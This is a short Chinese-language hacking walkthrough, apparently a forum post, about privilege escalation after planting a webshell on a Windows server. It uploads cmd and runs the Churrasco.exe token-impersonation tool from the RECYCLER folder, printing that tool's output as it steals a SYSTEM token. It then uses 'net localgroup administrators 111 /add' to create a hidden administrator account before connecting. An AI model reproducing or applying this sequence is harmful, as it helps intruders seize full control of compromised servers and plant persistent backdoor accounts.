拿到SHELL后先看可写的盘,看来这个SHELL权限不错
下面接着看,如何提权
wscript.shell √ 命令行执行组件
这个是OK的,可以

传了CMD,所以可以执行,没传时是不能的 ,给大家看下
下面进入重点
不多打字了,大家看操作
无法执行,所以要用到刚上传的一个东东
Churrasco.exe
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 708
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 712
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 716
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 724
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xeec
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found admin$ Token
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found SYSTEM token 0xee4
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
命令成功完成。
C:\RECYCLER\Churrasco.exe "net localgroup administrators 111 /add"提为管理员

上次设置密码           2009-1-12 21:20
密码到期               2009-2-24 20:07
密码可更改             2009-1-12 21:20
OK,然后连接